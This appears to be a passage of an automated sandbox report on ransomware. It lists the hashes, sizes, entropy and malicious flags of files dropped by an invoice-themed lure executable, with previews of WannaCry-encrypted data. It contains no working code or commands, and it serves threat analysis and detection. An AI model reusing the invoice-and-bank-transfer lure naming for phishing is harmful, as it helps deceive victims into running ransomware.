                                                          SSDEEP:768:QM7cP4h19Tgrqs29AFef/t6NEDAi4JlatDFFuz8pWZjhxfdPoCY19gCDlxEn/6lM:B7BH/FG2/8EDAiEgtJFuwpWHP/YzgU8t
                                                          MD5:ACEBFE60229DB6607C842A136FC91BF4
                                                          SHA1:6B4FE9CCEE1F7031FABFC5014EF0D773007CFF1C
                                                          SHA-256:5955D7566B9B12C58A1BA6158638525B3EC62CA63BF9382B1544CD933001E6A7
                                                          SHA-512:35D2C124F80FAEE2929C95920966F70D74B9A226B42F8B9D9B1A50DC092F1C3B9D6B057E8C077ADC370ABC214F406071BFCAACA4BBA76345F75036D0ECBEF6BF
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):40248
                                                          Entropy (8bit):7.995906066528075
                                                          Encrypted:true
                                                          SSDEEP:768:mzugY9rrjHzym2ufxGWPqwjtzfkElj4e4mB9Eth1XM+RlNHZ7yj3sUwb9ce2D6nR:migY9n7z/2ufIZMjr4jtnxRlf7z+6R
                                                          MD5:65348BBA392960946FC58A1B4748D78E
                                                          SHA1:B12C963B53BB5506280940F2D9FC7AC7667FC180
                                                          SHA-256:6C7205BCBEE078BC94DBDD842688CF28F7AFC9508696811BB22F5954E9219373
                                                          SHA-512:DB3D0F98547BF8AF9BCCD667B8E135A9920EE99C64CFC2C0A4E04E68E3C240D85AFC5F54B2149DDACDBCBFA95943EB6E70C241457609E5C8B4C0AF55E7A5F122
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2152
                                                          Entropy (8bit):7.912206010499335
                                                          Encrypted:false
                                                          SSDEEP:48:bklwTYYqdy7O5FJZEamvmRl21aVKFP1GrtlZfLz8S6ehbchAcP:olwTYYWyaZEvL1aSNYL5z8S6U0P
                                                          MD5:08A1FE9241BCE912295D29361007AF9D
                                                          SHA1:2E31D317DE35CBDAD63850DCC126345CD17D1ED5
                                                          SHA-256:F2C0C5D200BFE403156067A2641556C19FD5703C66CEE15CCEDFE5793E85FB7C
                                                          SHA-512:869DF26F6250E5D5DE6DE6B5A21B2719C886A5CD37D8C7507496EB1B975055F569D6D69DC170925AAC53A9BD299ACCF700ADE490F507D99C6D22335454F21069
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):408
                                                          Entropy (8bit):7.398701215643315
                                                          Encrypted:false
                                                          SSDEEP:6:bkEwDxLNUtGdhVhL81i3BGwlDbxaDOdeY8SAHujH4AybVBxQrUl/RaOzr2s9DtdY:bkE0zFF9NXaD5YAHuyxsUl5aOz5wdQ6v
                                                          MD5:7A1C64DC5BAA13652DA15E5E8D2C7AF5
                                                          SHA1:942C6AF4B905037B645F87BF669AE35E80616CDE
                                                          SHA-256:7272E7B7008F3447E9ECD64A87D2F5C7D5CCF28C0893FB62DD2D29A73E84E886
                                                          SHA-512:E4216615A59E436818360C85376C045F10072339DF4CC3D647D0AA769C83CA28DFBF126DD88277C4B5756AF396C7DAE91EC2A1B43D842F1F035B62ED12C63791
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):126392
                                                          Entropy (8bit):7.9988208529331875
                                                          Encrypted:true
                                                          SSDEEP:3072:6cVU4WUFVZ/EhK0dxDzhG1othBtm1uxbx5BQZn:p9WxM6xvUotm4d5SZn
                                                          MD5:80FFD7B6C1BA67B09E119C245D4D13E9
                                                          SHA1:7210BFC868CB948DD92741BA64E52B797C8FF5B8
                                                          SHA-256:CDB556610509EAED84F980ACF1EAD44AB3E2240018F580C673332484FB2DAB40
                                                          SHA-512:F02C55BEDBE36FF64E6F5A66CD8193BABBD7CF4EA87B11527C79D601E085765D7F34F94730D42CB2DA004FB4795D4EA7B4F0860E0CDE6A5AEAF34243A74C041B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1896
                                                          Entropy (8bit):7.907678234482592
                                                          Encrypted:false
                                                          SSDEEP:48:bk20kj7D6gwoITcljTXu4u4iqvJvGFVWMjVDM5E:owjH6kITchXa8vJvC1wE
                                                          MD5:2961DEB33EB75291558C98F8CEF61794
                                                          SHA1:06AA55030082F5AD4140CDC3F08FE636087C5E01
                                                          SHA-256:1BEE68E37667D803F5CDF89CF066C037F61F95E4A369030CCB54179B12004CF2
                                                          SHA-512:E6BF52FF25CBF731D1E448B8F885DE03CFC2384C4AF6B678A01A459CC0CF4648CFB5DD6D6A7F48693E5F8C733FEF14F261AA9827B5E763FDB48C483DD4645AA1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....o.ph"...cV2...@.}.j.Z..\.........-...a...Eg!.....f.y..m9......6..$.C9\..t..X.}...{....M.,.;.a ..8...lc..:..P/..G)..-..b...)]2"...0.M...m..k....v..h.5...;5..vf...SH..._.[gA...m....E....}.......b..#.r..m............/..?K.#...Y.9~d7...$....=zb.....O........5W.%:.....8K"I.ikPi..h.e....+_.^...>....\AEa...P....l8...y..jC.1..#.{...S...5^..y............'.^Uta.^_....4....:.\.d.~.R.yU.*oL..y.....=...W.H'(cR.........(.8....:.@3<.a...c.Z..!...j...n1r...9.C,..P..r...y!...9.3..Ll../..sS.L.{O.......3.h3y.8q........M.[i2."..$.. ..?..{':...4.Q.P5...\..C..F~p'"..a..R..*.}...Z...-....y...k..0.....]`..a..B]!..........Q8..}.Q......4..('+......,..T..i..u-....Sy.a6...=..o@.E.J.V...76.jI.e...%..>.y1.`..............N..M\.5..k.|M..H.L...s...U.........Gn..//p.u......P.&}=d.[.*.."..<n.G.......g."..M..!4...+.G.J 9&@..Z.....7....]H...t..=4..w/...m.I.w.Y..].cs.5...[...............,...k;#.....J..O.".hv[.[. ..x...kQp..Uc.....u....z.....I6.W...@t.....a.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1896
                                                          Entropy (8bit):7.907678234482592
                                                          Encrypted:false
                                                          SSDEEP:48:bk20kj7D6gwoITcljTXu4u4iqvJvGFVWMjVDM5E:owjH6kITchXa8vJvC1wE
                                                          MD5:2961DEB33EB75291558C98F8CEF61794
                                                          SHA1:06AA55030082F5AD4140CDC3F08FE636087C5E01
                                                          SHA-256:1BEE68E37667D803F5CDF89CF066C037F61F95E4A369030CCB54179B12004CF2
                                                          SHA-512:E6BF52FF25CBF731D1E448B8F885DE03CFC2384C4AF6B678A01A459CC0CF4648CFB5DD6D6A7F48693E5F8C733FEF14F261AA9827B5E763FDB48C483DD4645AA1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):254712
                                                          Entropy (8bit):7.999402730206514
                                                          Encrypted:true
                                                          SSDEEP:6144:dVzo15KxuStCONrVjj8j2k4w+lx9Onw+rG6BiZu96n1t:dFO4zC2kD+lx9OwMBEu961t
                                                          MD5:0A6054136BA2548D6D18E70F7947C89A
                                                          SHA1:DE4EE736B69784FDBFA3B8A123F274FE180A23E1
                                                          SHA-256:2938F55AD7FBE4733B954034F4DD7E259E0D2AE94E8D58AC47986780A66143E9
                                                          SHA-512:1CC80BB97AC336A89828E302CA3452E79A0C3C21A6F9E883532CB93B95DBC10BE6C8B66DFDB853A72B6D15FC6C0AF7115C9D518E7BC53C99EDB3060C0C3002F6
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):58072
                                                          Entropy (8bit):7.997006684572673
                                                          Encrypted:true
                                                          SSDEEP:1536:JqVL9iN486v4m0i0p76RzTyP7CpM6uQfhsYnGy19:JqVL9iL6v4w0p76xuP7CpbuihZnX19
                                                          MD5:8EDEE0962FC8F44856A3CCFD70E24136
                                                          SHA1:99EBE7AC033D2B8CE0CA3DF875E84C93988AA81B
                                                          SHA-256:52AF85A11FAAB364FFC335AE7740F7F0864417468239D032E3CF9E3D65705F41
                                                          SHA-512:2B0AC5B417743AB6D75C9EBBC022D3110917C311443717EDE3C88417CBC657B9CC1CF9352B3B8D5568DBC1671C40AB2FDE4B44BFCDDC2D9136975C25B70EA1AD
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):95672
                                                          Entropy (8bit):7.99787015794684
                                                          Encrypted:true
                                                          SSDEEP:1536:xVZN9X8uk1a/0VuLhk00Khk7NlPeT5ioWTcmUy+enkPdHZZJwBfTTeQCfU:xN9wa/30KhmNlGT5fWTXUWWZCf3/SU
                                                          MD5:48174A1DEF5D80CBE004A665DADBD195
                                                          SHA1:0F7645FA44EEDBB24148CDD68D8F2317AD5CB543
                                                          SHA-256:033CA839F10E9919664F1861CB094AF3EDC166BE3AEC14DE9BDCFB8F646DF194
                                                          SHA-512:E922F4C2312D4470E9122FFC82B517FD1789209E26D1D41DE9DC33062A8ADB5120E75DD69D7F38D6509CBC4DC710360CDE8DC85DA27997D231378C14B029CD9B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):58104
                                                          Entropy (8bit):7.996712442774742
                                                          Encrypted:true
                                                          SSDEEP:1536:DHFDXsViS8gbZaVLSXHKfKmyZMYgToIEA4pt6YnVliYml:RpmeCKCgoIv4pt6YnVgYml
                                                          MD5:F422952E686226B5D718053DB1150635
                                                          SHA1:2993757FE9D20B75BD6F9BCC052155FA6CB6F5D1
                                                          SHA-256:917B2AB6781BF71FF33BD206ED50F445044902E803C1085206611F3E21A63683
                                                          SHA-512:C209CD91E35BAC321BAB022AD634AE14768CDAD823DB6C4C51CD2C4AFBC58471ACA8D9BF8D51C36941AFC63FE531E8B5AF97E538E055BCE3133789F845A4436F
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):18792
                                                          Entropy (8bit):7.9910278599044045
                                                          Encrypted:true
                                                          SSDEEP:384:hcvUcWWrHk2IiLMRrNwQ2ZOd6ApsSYH4i/vaIupOwJMslhA5ZtjmhHIzkqKUvzsg:avJA2Ix9dmdH//vaIufi5Fm5CkqRzsBm
                                                          MD5:8731AB6565164DA52CD3193FA5CC3181
                                                          SHA1:DDE925C40A4E17CE6D55BCDF066D1BBB59727E10
                                                          SHA-256:579853B9EAABA0548D58959247F155E056E7EA6A4504655F3374D53E34F971F2
                                                          SHA-512:ABFADAB5F903F013BD62B294B22B96A0D3E0C2190276173197A554362842A46F27C8528D856472175AB1BC530FD874592DA8246026A4D40E3C141C53671A9772
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1944
                                                          Entropy (8bit):7.901525039374476
                                                          Encrypted:false
                                                          SSDEEP:48:bk0JcQJFNtpMJDkGyjvxNxqH8ESs/5h3d:o0SyHpM6/fwBhN
                                                          MD5:0A958A61D903B522F66433124E4659A4
                                                          SHA1:2F0836DA6261907094B80329874873B273A4B678
                                                          SHA-256:3C2A1B57F99C4CD58B1817EA189D34879B3759C5585C7733251006D3EE3D44CC
                                                          SHA-512:DA3F8AC9A49C7293F273A200CA921845A4D9518B8C91B57BF0B955DEDF0F4DCA45733F21A60FCD5BFA80BCC7A727A9F6D3B7BAB60882C9EB6ECF80AC7D254E1B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):18968
                                                          Entropy (8bit):7.990885407876004
                                                          Encrypted:true
                                                          SSDEEP:384:alxPAR0TvaDYRbKWywENIa3eO1d5um4MyNn0r6ynimdJT4F3jDMN7AAMEC5lu:al5ARuvaDK5oSa3bqMYMimX+c56vu
                                                          MD5:AD90740B515F1F7A333D96447EFD8EA7
                                                          SHA1:515902C47588F82C2C67ED7B0C5E4EF81CBFF3AD
                                                          SHA-256:2A43E8BE439832E9C1933BF5024E9266C8EAE01EA1EB812D7A05A62FDFDFECF8
                                                          SHA-512:B824CA737999394739B0D3734E33C6D1AB74CC95F64FFB2EC5C52AC3D1B56C54599F5CFECBCA9BCBAA3E7FA652F71B96D2C80ADA12F9720618EB13956C2D26D4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.194538372505552
                                                          Encrypted:false
                                                          SSDEEP:6:bkEbBkZ2EjZ2spWzbFybtTuT+ZbcHOD0pQGERG3ysmTSAv1o2HcjBCV:bkEbBk/jZ3pWzbghZbN0pQGmG3yblvKW
                                                          MD5:5EFAA57DA8BBCBACF2A206E88DCFD7EB
                                                          SHA1:54E6707FE5387B9C78BE9F76FA317AD4BC3E116A
                                                          SHA-256:6D70C9C353FD64CB51601A92B33A3BD269586A3E8682078A408D7C560B3522FF
                                                          SHA-512:CDD4DD769F5175BF8A012E4E8AABFACA7E78DEB3D943E3FA49A520FC7953709B1FE9CAB382E4E48309FCAB255D115E7446E891F95DB22B4BDCD14FF25D97558A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.241362294567419
                                                          Encrypted:false
                                                          SSDEEP:6:bkEh1BJpF6+w7O2bXHzfMDsUOAyJOL8vR0te6i8DNwRtqNJ7jYyGuiN:bkEXBzElK2bXHz04AOOL8qe38LGuiN
                                                          MD5:E4EEB691BC759C123F50102BF24DA44F
                                                          SHA1:1E8CD73A38E58E7E23F826798CE3AAC750346335
                                                          SHA-256:C5A1D1F5F1B627DF32598D5F15EADAC2E4F4D74442536F44FEB85728BF18B5A1
                                                          SHA-512:6C6AC2AA3FA6D983E9F21FD547CA31393374D0CE1C2D22B4B9292F3BB98BEA06605B54C4878FCA2DE3ADE38104E3E303B1DCE845297EF6F27FC21406ED480270
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.178970851132325
                                                          Encrypted:false
                                                          SSDEEP:6:bkE6OF1mEHYaA7ZLfflkOD02udIgqU5q8QeIcUXsm7XKvd7iWe:bkE6CG7ZLV1uV5UeI3sms7Ze
                                                          MD5:74D4A420BED6A710AF18B63EF073A711
                                                          SHA1:8DD3E8E4DE847171977B2D3458B2887F756A3ACC
                                                          SHA-256:C16C06CAC55DEC5E7394E7C2B0D0633035585168F07090D86C47B53B4199A2A4
                                                          SHA-512:033623999E8DD085E9305FBAC043E32AD284104793EA53F050B4BF3B311B2761429A4F6D47D2B39A64A7458D6BEFD842ECF34738C4868122B953658FA7C288E1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.203519648526362
                                                          Encrypted:false
                                                          SSDEEP:6:bkELlk4AdDyL6mLd/wd9w6ux9IMBprmWocF135eoh0OY7HvSIg+Pn:bkELSNdDyWOThOM/mWo01JnoHvS8n
                                                          MD5:9C8F50BFC6461CC49B94C727BBCE9C5D
                                                          SHA1:86775BB3F80F8226097D21837BB94518E48FDC90
                                                          SHA-256:07FB8420865E5620B3A747946050F7931C000E9F58D8A6466E4AF3D58FA17C7B
                                                          SHA-512:E662E5FB5FF4CE7EA8B22B0F7B07F1AC03E32AD50AE737C04F569D63A4E274574809CB4DE317E8F4CEAE8337B81CCD6AD9378AEFAA17857993B722527CBC85FF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):22136
                                                          Entropy (8bit):7.990371588378893
                                                          Encrypted:true
                                                          SSDEEP:384:tYyhZU2VlxnlrxfRnqnf4rmdffE6icpx9yBLwn/FuLeBN/jSDRFkdO175BXAe:3MAjlBRo4YPpxwBLw/FuLeBljMTV5Bz
                                                          MD5:018B4D42B05C29200D3C2DA3C662B26B
                                                          SHA1:E13E8C27E9C9C19B2445A6614E7D9789AF3581A6
                                                          SHA-256:75C814F2C5DE827C8B8173EEA96871D36EBA0EF6DB55C0968847C24351B3FB83
                                                          SHA-512:2EB1396D7D7F328BCE8EB62268E25E988022CE8F28ECC799732C0E60C4F7E214647DF91B4DB44DC3D756A53BE298CDAAE5ABC329E0D55661BF45474A8AACE5E9
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11720
                                                          Entropy (8bit):7.986291667950619
                                                          Encrypted:false
                                                          SSDEEP:192:TnKQLMosJOUtiUeXVGNm8QyqQBvYNbWOcA0i9mLHSLV5abBpMCjxvFk0r6sgPEpM:TnKQLMoqud4Nf5iUTQ/abBCcvFk5sguM
                                                          MD5:B28169C8A09A5C0AA8EE1409DA5D4341
                                                          SHA1:651A0347ABEC9E9F193EA92B67CF9560C3916475
                                                          SHA-256:7AD4D3729DC234508EE3B8246C857A8A12CDEAAB7491D42276910E8C282FCD3A
                                                          SHA-512:C7E63954AEC79120C90215F8C234F55E8F681AF051E2F3A09F4C084575A430C88B918EFF8342180C94C0B2755B593256877BDCCF6E4FD427EA2F623E7629C9D6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):19720
                                                          Entropy (8bit):7.991413595592335
                                                          Encrypted:true
                                                          SSDEEP:384:kE5bm0q3QDHIh/YeSlelzs8EBP3LoUodTKe4hjzF9kZrMnfpr6JSxjdotPf5:dsADTjlelzsBzoUodTehjzF9kZgfFsSo
                                                          MD5:E0EE4119B123CBE375C957060261584B
                                                          SHA1:842D02089E7B69B6C005924381F4080C34F2F066
                                                          SHA-256:B238803D53EAB5CEECBA697D9E814AE59F96ECA63A1DD32BD3BDE9530146341D
                                                          SHA-512:ADC75AF580D0031262070DBB9BFEFE7589BC6FFB45B9369388EF23C9466ADB92CE53498ED3BE19DC851E7258A5FC03DA9D67C5109DC658546034C358A97A4A20
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):25832
                                                          Entropy (8bit):7.993040086736139
                                                          Encrypted:true
                                                          SSDEEP:384:XAg2YNkfKkOhCyWLvX2VayMELrV4ZuR6Ugj0BBLJxOEQHZbz2PjUCCjvljJDb3nb:XRyKRhfWL+8QV42FZLJoPZbz45o5r
                                                          MD5:5C45D24F8A8AC6E0A0F9A9375A731D2B
                                                          SHA1:73442A74D6F972793BCFBADFF7881FDA5F2E40DD
                                                          SHA-256:CE9949CCA1FF9D19824EAE92BC17BE4E1BB5BAE08D79887339332318650BFEA1
                                                          SHA-512:65A39B4D488B980E8DCEDE08633F31D84F98C42AF42BA349A7DB69E02292FB53C7C9A039D402A0718C50D2B6A28472EFAEAFEF80E2279C112E9962FF98E93E37
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........T.'...'r.\..h&.u.....V.!....)W.....r.;.;.p...{}.!._..<....p\.j.._......uN3.k..LT.x/.}.*5..!..T.b...I.&}Fs.....1Z8~.}..,..iJy]..k..x].V.....^....Iv..I....V..z].^.9OI..W...c\..W.s...m.x.P%Z.....o..9\,..x"<...6#...c.F..q.E...`......4..q........c...........}s.~P....$.y....|..h.m..~{.;...X..=......!;.@N8AD.>j*k?..5Ak.U2\.Z....uu.|O.i..N..OH.].'.^.......y......I.=...6t..M....M@O.F...9.....PK..L.../......D..O5.g.Qz.Z.3:P..4z..z2..P....`.+k..L.g.qc.~.7...'...r...9.n.KKj.S.......6U[D......M.r.5.^.(....qJ....R...9K7_...I.0..^.Y.kE.......1.Q./L.>...$.........m......_8....l-=....-....I.......A8....D.!...d.*........ro...w..O._......Rn....".i...+U/54..._..".I<...-y-....8.../...4.6...<.!...Ng..D..tt....P..0W.i..oy4|)...($.I&.:Z*.E..|.Q-."ZC.nO....+.>..f#>..h....t.d.h>..qt...".,...}J`.......w.o..c.K..|..j..U..ES......P../J.....rCq.........Lu5.....*.."D..S.W..S7k....xUV?.TJYW"shq7.......}-N..5'....[.Wh.ds......N4.V.@.`P.Mq.J.;>I
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.224423422076759
                                                          Encrypted:false
                                                          SSDEEP:6:bkEa4JeCI/OBzmPDn/3TrORz8qwQbS5k4c5apq4bRrqI89Rsgr:bkEaEeCI/OBuDn/3eRpzSK4nq4eXr
                                                          MD5:A3E8D9AC9E41BDBD691B68E11556182D
                                                          SHA1:FA45686B2E45B1ED3AA9CE886C3D69F354D5E7B5
                                                          SHA-256:05B544573046984BCAEE109968FA6177CB06C8BD3AA6C6F513B0E8C049E376D9
                                                          SHA-512:B77B0EF368CA30689B3B403BDBE618BEA14D9D053CAB478C223E50EF2D916036497208B4A1675D5A6D42552D0F29E81398E0A53AACBEABAAEE129B25E6540E31
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....}n&....G]-.],.....xR$..`..&....r.1.....!...a.D....f.}........Y.T...1.i.P...5+v.\..4d_n(W2}.Z...16.41..h.s..{N/.2<......GZ\..1E.....%......Q._..c.W.w&...C.6.j........s....`.K*e..^...'..k._.sX\....TR..1k^....o~..:......(..'.O...b....).](.B....+.......JQo.JjT.....$4Y./,..X.....E.%....@f.n.....?.9
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.264826433214375
                                                          Encrypted:false
                                                          SSDEEP:6:bkE/vSBzBH7PxWsChSyIhkHpplOFAENO2Hbc46l0OFu0A2iIV+Cqs:bkE/qlVWsChSyRJplOF5No6OFuNfIR
                                                          MD5:D190E3DA88D505B9B9909264AA947F83
                                                          SHA1:A0230207B565E08A4E88258D2A9B0FD61118A31C
                                                          SHA-256:F6E3035C962B73295BED9AF5D36812F1524A69900E03B8D5F2B18056AC04CF69
                                                          SHA-512:B8E0A4535938CCE545BD389EE8ED798A585E333EF6C4B4E579A2D7AABC11302E823F4BAEF03AA2E51FB3563F81690AAD12C6A30458B411E7609390EC86945430
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....j.{."...wF>..|_...X..@J...FLj....{.6........I:.O.......d.w.."......$.W..v._.Z.hC=Q...............W.=.. ....etg_......WL..U9.FT.u.....X..3.F4'{.H6..`..iZ......V4....=.8m.a....<..AdF.J.....(.W..y.]~B.b....(.5j.F..x.....`.'....V..Vs..........]0C]....+........V.GS..d.S...*T.B......8..-.`.,t....o.S+JY.2.I
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.188362056807495
                                                          Encrypted:false
                                                          SSDEEP:6:bkEoiBPl4XZnFSAiDZ/rCQfTgbl15rjYrZguR+K89svYB8jJ8q2hNU2JjOmZ:bkEoiBPletFSAAZ/rCQrobFjYrZgZs8n
                                                          MD5:0D3CB8F33AA91A9C3619FDF90825DFF6
                                                          SHA1:BA4BE89C7D2A09B23FC33E58923D978D7A6C5062
                                                          SHA-256:77B480B665175C532D31E80D839F543E50A52D81AE9377FA6A2F0FED0C1984DD
                                                          SHA-512:F0AB3097C3991E1954AC92C557EA409209D5A6A30C549F876E42A4635716A5BB3111316A5CB7B874CDBB0DD0897052CCD53657EA7F6EC6F3F6980416A40C1319
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....mN........t.D.X..6u..G.&...j...&l.....W.-I..6y.q...@..w..T..i..q.C+...?..`Y.x..5,.Kzq..$....q6.j..d1...N......L.*;..rn83p..dy...D"...t.% ..D.....iD+N.C.x;f&:.I.R.....aU....6W.....X...........a...f7.f.....)(p.......r.h...{U.'.."...\wW@....U.D...)....+.........(..y~Xzu..6KN.s...H..?..6.EV.<".$...+[..;...N
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.2734234425693565
                                                          Encrypted:false
                                                          SSDEEP:6:bkEk9gGpfL5oBePgG7F0viY4DbI4E5kuGR5G/O2fNitOUhuXNWpe/Wr:bkEk9gGN20B7OT4DU4MkuaSzIOUhFe/g
                                                          MD5:7F13D5DC7D89D375E5C2D99FDC6EB5FC
                                                          SHA1:65776A18810EE3AB895FD10630939531E0793563
                                                          SHA-256:760ECB3F3DD2527D995FF0A3A3CDCE6B7ADCDA30F018FE126C9B787497070383
                                                          SHA-512:E2F1E01D6463D1E61C01E225847991E078CAB3E420B86CEDCAEE7862B32599667E2E70CD994A2600D97A5684E3129FD72D20D969A7C1D8BCD7D4D02C9E367EB2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........W;@....:.|!...W;.....lKdz..1..[B,.'.Sj..,bru.M..8*TH..c.nA..7x.D..S.5./...E.+r.......g.B.6.f..~....tn...W...Ss.r._..l.;..g<..P.5`^.V/..!3.oa.....Y.T...t#P......-...7...."....&..p..\l2..g...}.b.... ?..?........M&..M...Y3B$..../...q._F.....+.......#i...`0l7{...y....qr..qo.u..'...~....5.1.u.r.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):20120
                                                          Entropy (8bit):7.990697539679428
                                                          Encrypted:true
                                                          SSDEEP:384:hsca1HnNell1OcqcIBz4wrZaxAvAGFu3JJBNm2549c4uHMwRJKTxfXh:u1HwTfqBBz4wrNvCZJrmJc4OXKTRXh
                                                          MD5:95E718821BE3BC62A55F387EC8C56CFF
                                                          SHA1:3DF12708FED6597E70CC9AC1755A33EB088BA0CD
                                                          SHA-256:FAA9ED43789DA21F66343A8725F18972F8E93409F4543EE051CACDA8AAD2E1D5
                                                          SHA-512:52151721E2E9BCAE7BB073AB21F957A9366C70CEA712E8F89D04C9FBEEB2ECBD901EBD08CB0949441BE94481A748DE36DFE287956068181D63EF0050DC3E3163
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....S..v........i....>.p..fPv...p7_..y.#8;.E..B....Il...j..{.e.....O[.A..,..E...V!3.B..UC....1D......v..,%w.......eNq..L....Z..Wb..9......9Pv[.n7`.....$\7.....D.n\PW>.W).O..6.../<*..w0...l.N*..6(......<....c..jw.H".%.W.<....).w.J....p!..W.....R/8....rM.......|.!.F.X.C.V...9\`..H.^...e.*.-.M....n..A...4.w.......y.n...K......Z.P...1.{.&H..JB.'T...k.S.fo...A...*.w...M`...K..-.6b...7.o.a\...`..&........A'..1......Z...../m.Y.......G..T.........._.....`!...Y.......7p....)..n....mXs...Z7xw.x.O.gh.x.F...!.4....KR...e.......A...3.......2.d:.O....NY.s.%...)K....AI.b...M.../.}]....M%.r5.*.....2...D8..%.*..z...70..ER..l.uSf..E...R....t...xL..w...#...C..Gv........j..S.V........^........@...t........7....+c..8..hrJw>......\j.......+.+.}....AIr..y.5..(/4.....9..'.....(..cM......W..w..@....N.....H..5..%.o.l.....^...~#"....*.M..z.[.....s@E.Ss...m..s.....Z..(......D.....6.K.KS..q....q.XC.c..)QM....y.<}.l6..F...SOn.......%..&...g.....:(.H......
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):112328
                                                          Entropy (8bit):7.9984266644630875
                                                          Encrypted:true
                                                          SSDEEP:3072:LY1C/KjlHt9bGGKmUsThHqfmp2j3EJyjGyWhYVvkqO:LMt3bGG6yIfmpEoyjHWqVMqO
